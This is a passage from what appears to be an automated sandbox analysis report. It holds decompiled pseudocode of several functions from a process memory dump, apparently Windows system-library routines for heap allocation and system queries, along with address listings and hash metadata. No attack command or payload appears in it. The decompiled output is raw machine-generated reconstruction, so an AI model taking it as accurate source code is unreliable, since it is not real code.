                                          0x00000000
                                          0x011774d3
                                          0x011774d3
                                          0x011774d6
                                          0x011774d8
                                          0x011774db
                                          0x011774dd
                                          0x011774e0
                                          0x011774e7
                                          0x011774ee
                                          0x011774ee
                                          0x011774f4
                                          0x011774f9
                                          0x00000000
                                          0x011774fb
                                          0x011774fb
                                          0x011774fd
                                          0x01177500
                                          0x01177503
                                          0x01177505
                                          0x01177505
                                          0x011774f9
                                          0x00000000
                                          0x011774cd
                                          0x011774b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: 46dec3bc13ca46589379d0e3a948fdc1ecd505fbf926ce97e54f433a191be042
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: F3519B71600646EFDB2ACF18C484A96BBF5FF45704F15C0AAE908DF252E371E946CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D2990 Relevance: .1, Instructions: 133COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E010D2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x117ff00);
				E010FD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1081664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E010EE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1081668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E011251BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x108166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E010D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E010B6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E010D2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E010D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E010D2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E010D2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E010FD0D1(_t62);
				goto L28;
			}





















                                          0x010d2990
                                          0x010d2992
                                          0x010d2997
                                          0x010d29a3
                                          0x010d29a6
                                          0x010d29ab
                                          0x010d29ad
                                          0x010d29b2
                                          0x01115c80
                                          0x010d29b8
                                          0x010d29b8
                                          0x010d29bb
                                          0x010d29c0
                                          0x010d29c5
                                          0x010d29c6
                                          0x010d29c6
                                          0x010d29cb
                                          0x00000000
                                          0x00000000
                                          0x010d29cd
                                          0x010d29d0
                                          0x010d29d9
                                          0x010d29db
                                          0x010d29dd
                                          0x010d2a7f
                                          0x010d2a84
                                          0x010d2a87
                                          0x010d2a89
                                          0x01115ca1
                                          0x01115ca3
                                          0x00000000
                                          0x010d2a8f
                                          0x010d2a8f
                                          0x00000000
                                          0x010d2a8f
                                          0x00000000
                                          0x010d29e3
                                          0x010d29e3
                                          0x010d29e3
                                          0x00000000
                                          0x010d29e3
                                          0x010d29dd
                                          0x00000000
                                          0x010d29db
                                          0x010d29e6
                                          0x010d29e9
                                          0x010d29eb
                                          0x010d29ed
                                          0x010d29f3
                                          0x010d29f5
                                          0x010d29f8
                                          0x010d29fa
                                          0x010d2a97
                                          0x010d2a9a
                                          0x010d2a9d
                                          0x010d2add
                                          0x00000000
                                          0x010d2a9f
                                          0x010d2aa2
                                          0x010d2aa5
                                          0x010d2aa8
                                          0x010d2aab
                                          0x01115cab
                                          0x01115caf
                                          0x01115cc5
                                          0x01115cda
                                          0x01115cdc
                                          0x01115cdf
                                          0x01115ce5
                                          0x00000000
                                          0x01115ceb
                                          0x01115ced
                                          0x01115cee
                                          0x00000000
                                          0x01115cee
                                          0x01115cb1
                                          0x01115cb4
                                          0x01115cb9
                                          0x01115cbb
                                          0x00000000
                                          0x01115cbd
                                          0x01115cbd
                                          0x00000000
                                          0x01115cbd
                                          0x01115cbb
                                          0x010d2ab1
                                          0x010d2ab1
                                          0x010d2ac4
                                          0x010d2ac6
                                          0x010d2ac6
                                          0x00000000
                                          0x010d2ac6
                                          0x010d2aab
                                          0x00000000
                                          0x010d2a00
                                          0x010d2a09
                                          0x010d2a0e
                                          0x010d2a21
                                          0x010d2a24
                                          0x010d2a35
                                          0x010d2a3a
                                          0x010d2a3d
                                          0x010d2a42
                                          0x010d2a59
                                          0x010d2a59
                                          0x010d2a5c
                                          0x010d2a5f
                                          0x010d2a5f
                                          0x010d29fa
                                          0x010d29f3
                                          0x010d2a64
                                          0x010d2a64
                                          0x010d2a6b
                                          0x010d2a6b
                                          0x010d2a6d
                                          0x010d2a72
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3a8766a1f0f5c8f48ab196eee76ff6b0097732273d46116dff957a6eed9ff83
                                          • Instruction ID: 8e2218c720ff83b757e85a29db03ff394042ea4b672a94ad35b234b44be96776
                                          • Opcode Fuzzy Hash: a3a8766a1f0f5c8f48ab196eee76ff6b0097732273d46116dff957a6eed9ff83
                                          • Instruction Fuzzy Hash: 53516771A0020ADFDF25CF99C880ADEBBB6FF58310F158165F990AB220D3319952CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D4BAD Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E010D4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x119d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E010ACC50(_t86);
					L11:
					return E010EB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1198504
				E010C2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E010EFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E010EB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L010C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E010ACCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1198504
								E010BFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E010D4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                          0x010d4bad
                                          0x010d4bbf
                                          0x010d4bc2
                                          0x010d4bc6
                                          0x010d4bcd
                                          0x010d4bd9
                                          0x011167fe
                                          0x01116800
                                          0x010d4ccc
                                          0x010d4ccd
                                          0x010d4cb7
                                          0x010d4cc9
                                          0x010d4cc9
                                          0x010d4bdf
                                          0x010d4be5
                                          0x00000000
                                          0x00000000
                                          0x010d4beb
                                          0x010d4bef
                                          0x00000000
                                          0x00000000
                                          0x010d4bf5
                                          0x010d4bf9
                                          0x010d4c06
                                          0x010d4c0b
                                          0x010d4c17
                                          0x010d4c1c
                                          0x010d4c1f
                                          0x010d4c25
                                          0x010d4c33
                                          0x010d4c3d
                                          0x010d4c40
                                          0x010d4c43
                                          0x010d4c47
                                          0x010d4c4d
                                          0x010d4c53
                                          0x010d4c54
                                          0x010d4c55
                                          0x010d4c56
                                          0x010d4c5b
                                          0x010d4c5c
                                          0x010d4c63
                                          0x010d4c6b
                                          0x00000000
                                          0x00000000
                                          0x01116776
                                          0x01116784
                                          0x01116784
                                          0x0111679f
                                          0x011167a7
                                          0x011167af
                                          0x011167ce
                                          0x00000000
                                          0x011167b1
                                          0x011167b7
                                          0x011167b8
                                          0x011167c1
                                          0x011167d3
                                          0x011167d9
                                          0x011167dd
                                          0x010d4c94
                                          0x010d4c94
                                          0x010d4c98
                                          0x010d4c9c
                                          0x010d4ca3
                                          0x011167f4
                                          0x011167f4
                                          0x010d4cb5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010d4cb5
                                          0x010d4c79
                                          0x010d4c7e
                                          0x010d4c89
                                          0x010d4c8b
                                          0x010d4c8f
                                          0x010d4c8f
                                          0x00000000
                                          0x010d4c89
                                          0x011167c3
                                          0x00000000
                                          0x011167c3
                                          0x011167af
                                          0x010d4c73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d9ca1caa6a1d1989b2815e98ddf9c4a154715c29660f6d31788ea3d3dfc2e857
                                          • Instruction ID: bf40473cbf0c0c0dec9b273bbed836ede608f71e569b7a15f47c5276dd9f2c5c
                                          • Opcode Fuzzy Hash: d9ca1caa6a1d1989b2815e98ddf9c4a154715c29660f6d31788ea3d3dfc2e857
                                          • Instruction Fuzzy Hash: 0641B231A0062D9BDB61DF68C940BEEB7F4EF45700F0104A9E948EB245EB749E80CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D4D3B Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E010D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x119d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E010EFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1197bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E010EB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L010C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E010ACCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E010EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E010EF380(_t67 + 0xc, 0x1085138, 0x10) == 0) {
								 *0x11960d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E010D4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E010D4E70(0x11986b0, 0x10d5690, 0, 0) != 0) {
					_t46 = E010ACCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                          0x010d4d3b
                                          0x010d4d4d
                                          0x010d4d53
                                          0x010d4d58
                                          0x010d4d65
                                          0x010d4d6c
                                          0x010d4d71
                                          0x010d4d77
                                          0x010d4d7f
                                          0x010d4d8c
                                          0x010d4d8e
                                          0x010d4dad
                                          0x010d4db0
                                          0x010d4db7
                                          0x010d4db8
                                          0x010d4db9
                                          0x010d4dba
                                          0x010d4dbb
                                          0x010d4dc1
                                          0x010d4dc8
                                          0x010d4dcc
                                          0x010d4dd5
                                          0x010d4dde
                                          0x010d4ddf
                                          0x010d4de0
                                          0x010d4de1
                                          0x010d4de6
                                          0x010d4de7
                                          0x010d4de9
                                          0x010d4df3
                                          0x00000000
                                          0x00000000
                                          0x01116c7c
                                          0x01116c8a
                                          0x01116c8a
                                          0x01116c9d
                                          0x01116ca7
                                          0x01116cac
                                          0x01116cb2
                                          0x01116cb9
                                          0x00000000
                                          0x01116cbf
                                          0x01116cbf
                                          0x00000000
                                          0x01116cbf
                                          0x01116cb9
                                          0x010d4dfb
                                          0x01116ccf
                                          0x01116cd3
                                          0x010d4e32
                                          0x010d4e39
                                          0x01116ce0
                                          0x01116cf2
                                          0x01116cf2
                                          0x01116ce0
                                          0x010d4e3f
                                          0x010d4e41
                                          0x010d4e51
                                          0x010d4e51
                                          0x010d4e03
                                          0x010d4e03
                                          0x010d4e09
                                          0x010d4e0f
                                          0x010d4e57
                                          0x00000000
                                          0x00000000
                                          0x010d4e1b
                                          0x010d4e30
                                          0x010d4e5b
                                          0x010d4e5b
                                          0x00000000
                                          0x010d4e30
                                          0x010d4e11
                                          0x010d4e11
                                          0x010d4e16
                                          0x00000000
                                          0x010d4e16
                                          0x010d4e01
                                          0x00000000
                                          0x010d4e01
                                          0x010d4da5
                                          0x01116c6b
                                          0x00000000
                                          0x010d4dab
                                          0x010d4dab
                                          0x00000000
                                          0x010d4dab

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8389845f4bea21f4b551ec1a3bbc8bd9a1bb31c4990c3df12b8479502469ecf
                                          • Instruction ID: 3fdfa65f17c40199096f68841703ed622b28cc2d0454c35520cc9b81fa91e7ce
                                          • Opcode Fuzzy Hash: c8389845f4bea21f4b551ec1a3bbc8bd9a1bb31c4990c3df12b8479502469ecf
                                          • Instruction Fuzzy Hash: 2341F471A44318AFEB36DF18CC84FAAB7E9EB54710F0400A9E989DB681D7B4DD44CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116AA16 Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0116AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0116ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0116AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0116AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0114CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L010C77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E010C7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0116131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0114CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                          0x0116aa1f
                                          0x0116aa21
                                          0x0116aa23
                                          0x0116aa2b
                                          0x0116aa30
                                          0x0116aa36
                                          0x0116aa39
                                          0x0116aa42
                                          0x0116aa75
                                          0x0116aa7a
                                          0x0116aa7c
                                          0x0116aa7c
                                          0x0116aa88
                                          0x0116aa8a
                                          0x0116aa8f
                                          0x0116ab02
                                          0x0116ab04
                                          0x0116aa99
                                          0x0116aaa8
                                          0x0116aaaf
                                          0x0116aab3
                                          0x0116aacc
                                          0x0116aad1
                                          0x0116aad6
                                          0x0116aae0
                                          0x0116aaf3
                                          0x0116aaf9
                                          0x0116aafe
                                          0x0116aafe
                                          0x0116aaf3
                                          0x0116aad6
                                          0x0116aab3
                                          0x0116ab07
                                          0x0116ab0a
                                          0x0116ab11
                                          0x0116ab23
                                          0x0116ab13
                                          0x0116ab1c
                                          0x0116ab1c
                                          0x0116ab2b
                                          0x0116ab44
                                          0x0116ab44
                                          0x0116ab51
                                          0x0116ab51
                                          0x0116aa44
                                          0x0116aa47
                                          0x0116aa4c
                                          0x00000000
                                          0x00000000
                                          0x0116aa5a
                                          0x0116aa64
                                          0x0116aa72
                                          0x00000000
                                          0x0116aa66
                                          0x0116aa66
                                          0x0116aa68
                                          0x0116aa6a
                                          0x00000000
                                          0x0116aa6a

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction ID: 38bdf2c4528a71f22f74b24a8e7b9eafe66b8c0fe2f0f46e1ff7a66415d4f7c0
                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction Fuzzy Hash: 5F31F132B002056BEB198B69DC45BBFFBBEEF80650F058469E905B7291DB76CD10CA50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010B8A0A Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E010B8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x119d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E010EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E010BE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1081180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E010D1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E010E3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E010B8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                          0x010b8a0a
                                          0x010b8a1c
                                          0x010b8a23
                                          0x010b8a2e
                                          0x010b8a30
                                          0x010b8a36
                                          0x010b8a3c
                                          0x010b8a3e
                                          0x010b8a4a
                                          0x010b8a52
                                          0x010b8a9c
                                          0x010b8aae
                                          0x010b8a58
                                          0x010b8a5e
                                          0x010b8a6a
                                          0x010b8a6f
                                          0x010b8a75
                                          0x010b8a7d
                                          0x010b8a85
                                          0x010b8a86
                                          0x010b8a89
                                          0x010b8a93
                                          0x010b8a99
                                          0x010b8a9b
                                          0x00000000
                                          0x010b8aaf
                                          0x010b8abe
                                          0x010b8ac3
                                          0x010b8acb
                                          0x010b8ad7
                                          0x010b8ae0
                                          0x010b8af1
                                          0x00000000
                                          0x010b8af1
                                          0x010b8acd
                                          0x010b8ad5
                                          0x010b8afb
                                          0x010b8afd
                                          0x010b8aff
                                          0x010b8b07
                                          0x010b8b22
                                          0x010b8b24
                                          0x010b8b2a
                                          0x010b8b2e
                                          0x010b8b3f
                                          0x010b8b78
                                          0x010b8b41
                                          0x010b8b52
                                          0x010b8b54
                                          0x010b8b5c
                                          0x010b8b74
                                          0x010b8b74
                                          0x010b8b5c
                                          0x010b8b3f
                                          0x010b8b5e
                                          0x010b8b61
                                          0x010b8b64
                                          0x010b8b64
                                          0x010b8b6c
